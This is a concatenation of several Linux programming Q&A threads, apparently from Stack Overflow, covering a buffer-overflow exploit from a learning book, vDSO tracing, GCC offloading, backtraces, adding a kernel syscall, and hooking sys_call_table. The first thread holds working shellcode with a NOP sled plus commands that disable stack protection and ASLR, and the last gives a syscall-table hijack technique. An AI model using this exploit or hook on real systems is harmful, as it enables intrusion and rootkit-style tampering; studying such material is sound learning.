I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:
-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0 followed by a recompile, with no success.
It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures.
I'm a bit more informed on what's going on now. The given code constructs a buffer and then passes it to a program called notesearch that has a buffer overflow vulnerability. I didn't figure out how to disable the protective measures on the current version of Ubuntu, but the methods I tried do work on my Ubuntu 9.10 virtual machine. That is, -fno-stack-protector works as a gcc flag, and when paired with sysctl kernel.randomize_va_space=0, buffer overflows that execute shellcode on the stack are permitted. It's a bit of a workaround, but running my VM suits me well and allows me to continue through the examples in this book. It's a great book if you're interested in learning exploits.
Are you sure you're passing -fno-stack-protector to the right gcc invocation? The given code doesn't appear to have a buffer overflow.
I was wondering if there is a way to capture (in other words observe) vDSO calls like gettimeofday in strace.
Also, is there a way to execute a binary without loading linux-vdso.so.1 (a flag or env variable)?
And lastly, what if I write a program that deletes the linux-vdso.so.1 address from the auxiliary vector and then execve my program? Has anyone ever tried that?
You can capture calls to system calls which have been implemented via the vDSO by using ltrace instead of strace. This is because calls to system calls implemented via the vDSO work differently than "normal" system calls and the method strace uses to trace system calls does not work with vDSO-implemented system calls. To learn more about how strace works, check out this blog post I wrote about strace. And, to learn more about how ltrace works, check out this other blog post I wrote about ltrace.
No, it is not possible to execute a binary without loading linux-vdso.so.1. At least, not on my version of libc on Ubuntu precise. It is certainly possible that newer versions of libc/eglibc/etc have added this as a feature but it seems very unlikely. See the next answer for why.
If you delete the address from the auxiliary vector, your binary will probably crash. libc has a piece of code which will first attempt to walk the vDSO ELF object, and if this fails, will fall back to a hardcoded vsyscall address. The only way it will avoid this is if you've compiled glibc with the vDSO disabled.
There is another workaround, though, if you really, really don't want to use the vDSO. You can try using glibc's syscall function and pass in the syscall number for gettimeofday. This will force glibc to call gettimeofday via the kernel instead of the vDSO.
I've included a sample program below illustrating this. You can read more about how system calls work by reading my syscall blog post.
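#define _GNU_SOURCE /* feature-test macros must be defined before the first #include */
#include <sys/time.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
int
main(int argc, char *argv[]) {
    struct timeval tv;
    /* Enter the kernel directly instead of going through the vDSO. */
    /* No timezone argument is passed here, so the kernel sees whatever value is left in that argument register. */
    syscall(SYS_gettimeofday, &tv);
    return 0;
}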
Compile with gcc -o test test.c and strace with strace -ttTf ./test 2>&1 | grep gettimeofday:
09:57:32.651876 gettimeofday({1467305852, 651888}, {420, 140735905220705}) = 0 <0.000006>
Background
We have been trying unsuccessfully to use the new GCC 5.1 release to offload OpenMP blocks to the Intel MIC (i.e. the Xeon Phi). Following the GCC Offloading page, we've put together the build.sh script to build the "accel" target compiler for "intelmic" and the host compiler. The compilation appears to complete successfully.
Using the env.sh script we then attempt to compile the simple hello.c program listed below. However, this program seems to only run on the host and not the target device.
As we are new to offloading in general, as well as compiling GCC, there are multiple things we could be doing incorrectly. However, we've investigated the resources already mentioned plus the following (I do not have enough rep to post the links):
Offloading for Xeon Phi
Xeon Phi Tutorial
Intel Xeon Phi Offload Programming Models
The biggest problem is they usually reference the Intel compiler. While we plan to purchase a copy, we do NOT currently have a copy. In addition, the majority of our development pipeline is already integrated with GCC and we'd prefer to keep it that way (if possible).
We have installed the latest MPSS 3.5 distribution, making the necessary modifications to work under Ubuntu. We can successfully communicate and check the status of the Xeon Phis in our system.
In our efforts, we never saw any indication that the code was running in the mic emulation mode either.
Questions
Has anyone successfully built a host/target GCC compiler combination that actually offloads to the Xeon Phi? If so, what resources did you use?
Are we missing anything in the build script?
Is there anything wrong with the test source code? They compile with no errors (except what is mentioned below) and run with 48 threads (i.e. the number of logical threads in the host system).
Since Google search does not reveal much, does anyone have suggestions for the next step (besides giving up on GCC offloading)? Is this a bug?
Thanks!
build.sh
#!/usr/bin/env bash
set -e -x
unset LIBRARY_PATH
GCC_DIST=$PWD/gcc-5.1.0
# Modify these to control where the compilers are installed
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
TARGET_BUILD=/tmp/gcc-build-mic
HOST_BUILD=/tmp/gcc-build-host
# i dropped the emul since we are not planning to emulate!
TARGET=x86_64-intelmic-linux-gnu
# should this be a quad (i.e. pc)?? default (Ubuntu) build seems to be x86_64-linux-gnu
HOST=x86_64-pc-linux-gnu
# check for the GCC distribution
if [ ! -d "$GCC_DIST" ]; then
    echo "gcc-5.1.0 distribution should be here $PWD"
    exit 1
fi
#sudo apt-get install -y libmpfr-dev libgmp-dev libmpc-dev libisl-dev dejagnu autogen sysvbanner
# prepare and configure the target compiler
mkdir -p $TARGET_BUILD
pushd $TARGET_BUILD
$GCC_DIST/configure \
--prefix=$TARGET_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=target \
--disable-multilib \
--build=$TARGET \
--host=$TARGET \
--target=$TARGET \
--enable-as-accelerator-for=$HOST \
--program-prefix="${TARGET}-"
#--program-prefix="$HOST-accel-$TARGET-" \
# try adding the program prefix as HINTED in the https://gcc.gnu.org/wiki/Offloading
# do we need to specify a sysroot??? Wiki says we don't need one... but it also says "better to configure as cross compiler....
# build and install
make -j48 && make install
popd
# prepare and build the host compiler
mkdir -p $HOST_BUILD
pushd $HOST_BUILD
$GCC_DIST/configure \
--prefix=$HOST_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=host \
--disable-multilib \
--build=$HOST \
--host=$HOST \
--target=$HOST \
--enable-offload-targets=$TARGET=$TARGET_PREFIX
make -j48 && make install
popd
env.sh
#!/usr/bin/env bash
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
HOST=x86_64-pc-linux-gnu
VERSION=5.1.0
export LD_LIBRARY_PATH=/opt/intel/mic/coi/host-linux-release/lib:/opt/mpss/3.4.3/sysroots/k1om-mpss-linux/usr/lib64:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$HOST_PREFIX/lib:$HOST_PREFIX/lib64:$HOST_PREFIX/lib/gcc/$HOST/$VERSION:$LD_LIBRARY_PATH
export PATH=$HOST_PREFIX/bin:$PATH
hello.c (version 1)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma offload target (mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
We compiled this code with:
gcc -fopenmp -foffload=x86_64-intelmic-linux-gnu hello.c -o hello
hello_omp.c (version 2)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma omp target device(mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
Almost the same thing, but instead we tried the
#pragma omp target device
syntax. In fact, with mic, it complains, but with any device numbers (i.e. 0) it compiles and runs on the host. This code was compiled in the same manner.
Offloading to Xeon Phi with GCC 5 is possible. To get it to work, one must compile liboffloadmic for the native MIC target, similarly to how it is done here. The problem with your setup is that it builds the host emulation libraries (libcoi_host.so, libcoi_device.so) and sticks with emulated offloading even though a physical Xeon Phi is present.
Suppose a core dump is not generated (for whatever reason) and I want to see the backtrace (the execution sequence of instructions). How can I do that?
/proc/pid/maps stores the memory map of a process.
Is there any file in Linux that stores the user space or kernel space of a process? (Maybe I'm using the wrong words to express this.)
I mean the address-by-address sequence of executed instructions.
To see what the kernel stack for a process looks like at the present time:
sudo cat /proc/PID/stack
If you want to see the user stack for a process, and can get to it while it is still running (even if it is stuck waiting for a system call to return), run gdb and attach to it using its PID. Then use the backtrace command. This will be much more informative if the program was compiled with debug symbols.
If you want a backtrace to be printed in the Linux kernel, use dump_stack().
If you want a backtrace to be printed in user-level C code, implement something like this:
#include <stdlib.h>
#include <stdio.h>
#include <execinfo.h>
#define BACKTRACE_SIZ 64
void show_backtrace (void)
{
    void *array[BACKTRACE_SIZ];
    int size, i;
    char **strings;
    size = backtrace(array, BACKTRACE_SIZ); // fill array with return addresses
    strings = backtrace_symbols(array, size);
    if (strings == NULL) { // allocation failed; nothing to print
        perror("backtrace_symbols");
        return;
    }
    for (i = 0; i < size; i++) {
        printf("%p : %s\n", array[i], strings[i]);
    }
    free(strings); // malloced by backtrace_symbols
}
Then compile the code with the -funwind-tables flag and link with -rdynamic, as described at http://www.stlinux.com/devel/debug/backtrace
For educational purposes, I want to implement a system call in Debian Wheezy. I wish to implement it on the kernel that comes in the linux-image-3.2.0--rt-amd64 package. Here is an overview of what I have tried:
To get the kernel source:
apt-get source linux-image-3.2.0-4-rt-amd64
From that, I get the following files/directories in the directory where I ran the command:
linux_3.2.41.orig.tar.xz
linux_3.2.41-2+deb7u2.dsc
linux_3.2.41-2+deb7u2.debian.tar.xz
as well as:
linux_3.2.41
which contains the source code for the kernel.
Then, to make the necessary changes in order to add the system call, I basically followed this page:
How to write system calls on debian/ubuntu
The following is a condensed version of the instructions given there modified to reflect the changes I made.
File 1: linux-x.x.x/vpart_syscalls/vpart_syscalls.c
#include <linux/linkage.h>
#include <linux/kernel.h>
asmlinkage long insert_partition(char*dest, const char* src)
{
printk("<--- the syscall has been called!");
return 0;
}
File 2: linux-x.x.x/vpart_syscalls/Makefile. Create a Makefile within the same test directory you created above and put this line in it:
obj-y := vpart_syscalls.o
File 3: linux-x.x.x/arch/x86/kernel/syscall_table_32.S. Now, you have to add your system call to the system call table. Append to the file the following line:
.long insert_partition
File 4: linux-x.x.x/arch/x86/include/asm/unistd_32.h
In this file, the names of all the system calls will be associated with a unique number. After the last system call-number pair, add a line
#define __NR_insert_partition 349
Then replace the NR_syscalls value, which states the total number of system calls, with the existing number incremented by 1; in this case NR_syscalls was 349 and the new value is 350.
#define NR_syscalls 350
File 5: linux-x.x.x/include/linux/syscalls.h
Append to the file the prototype of our function.
asmlinkage long insert_partition(int lenTicks, int vpid);
just before the #endif line in the file.
File 6: Makefile at the root of source directory.
Open Makefile and find the line where core-y is defined and add the directory test to the end of that line.
core-y += kernel/ mm/ fs/ test/ vpart_syscalls/
I then proceeded to build the kernel in a different fashion than is described there:
make localmodconfig
make menuconfig (making no changes)
make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=+tm kernel_image kernel_headers
cd ..
dpkg -i linux-image-3.8.*
dpkg -i linux-headers-3.8.*
The kernel that is installed boots fine. I made the following c program to test the syscall:
#include <stdio.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
int main(){
printf("Calling the new syscall!\n");
int ret = 100;
ret = syscall(349, 1, 2);
printf("call return value: %i\n", ret);
return 0;
}
When I compile and run this program, I get a return value of -1. I checked the messages using dmesg and there is no evidence of my printk being called.
If anyone knows where my problem is I would be really, really happy! I should say I am not too experienced at changing and building the kernel, but I have learned a lot about it. I read Robert Love's book, Linux Kernel Development, and several guides on the web.
I think steps 3 and 4 may be incorrect for 64-bit kernels:
File 3: linux-x.x.x/arch/x86/kernel/syscall_table_32.S.
File 4: linux-x.x.x/arch/x86/include/asm/unistd_32.h
There are two files here: http://lxr.linux.no/linux+v3.2.41/arch/x86/kernel/
syscall_64.c 668 2008-12-24 14:26:58 -0800
syscall_table_32.S 8659 2012-01-04 14:55:50 -0800
The first one defines the syscall table contents for 64-bit mode using a C file and macro-cheating with unistd_64.h:
#define __SYSCALL(nr, sym) [nr] = sym,
const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = {
....
#include <asm/unistd_64.h>
};
Where asm/unistd_64.h is
#define __NR_read 0
__SYSCALL(__NR_read, sys_read)
and so on.
The second one, which you changed, is for 32-bit mode and is written as an asm file with labels (.long sys_call_name).
So you defined the syscall for 32-bit mode, but you are using linux-image-3.2.0-4-rt-amd64, which is for "64-bit PCs".
I think you compiled your test program as gcc test.c, which defaults to 64-bit mode. You can try the -m32 option of gcc (gcc -m32 test.c) to get a 32-bit application (this will only work if you have a correct cross environment for 32-bit builds), or compile this test on some 32-bit Linux.
Or the other choice is to make step "4a": edit arch/x86/include/asm/unistd_64.h to add two lines:
#define __NR_insert_partition YOUR_NUMBER
__SYSCALL(__NR_insert_partition, insert_partition)
I'm not sure where and how NR_syscalls for 64bit is defined. It may be generated during build.
I am trying to set the sys exit call to a variable by
extern void *sys_call_table[];
real_sys_exit = sys_call_table[__NR_exit];
however, when I try to make, the console gives me the error
error: ‘__NR_exit’ undeclared (first use in this function)
Any tips would be appreciated :) Thank you
Since you are on kernel 2.6.x, sys_call_table isn't exported any more.
If you want to avoid the compilation error, try this include:
#include<linux/unistd.h>
However, it will not work. So the workaround to "play" with the sys_call_table is to find the address of sys_call_table in SystemXXXX.map (located at /boot) with this command:
grep sys_call System.map-2.6.X -i
This will give the address; then this code should allow you to modify the table:
unsigned long *sys_call_table;
sys_call_table = (unsigned long *) simple_strtoul("0xc0318500",NULL,16);
original_mkdir = sys_call_table[__NR_mkdir];
sys_call_table[__NR_mkdir] = mkdir_modificado;
Hope it works for you. I have just tested it under kernel 2.6.24, so it should work for 2.6.18.
Also check this page, which is very good:
http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Fun_with_Linux_Kernel_Modules
If you haven't included the file syscall.h, you should do that ahead of the reference to __NR_exit. For example,
#include <syscall.h>
#include <stdio.h>
int main()
{
printf("%d\n", __NR_exit);
return 0;
}
which returns:
$ cc t.c
$ ./a.out
60
Some other observations:
If you've already included the file, the usual reasons __NR_exit wouldn't be defined are that the definition was being ignored due to conditional compilation (#ifdef or #ifndef at work somewhere) or because it's being removed elsewhere through a #undef.
If you're writing the code for kernel space, you have a completely different set of headers to use. LXR (http://lxr.linux.no/linux), a searchable, browsable archive of the kernel source, is a helpful resource.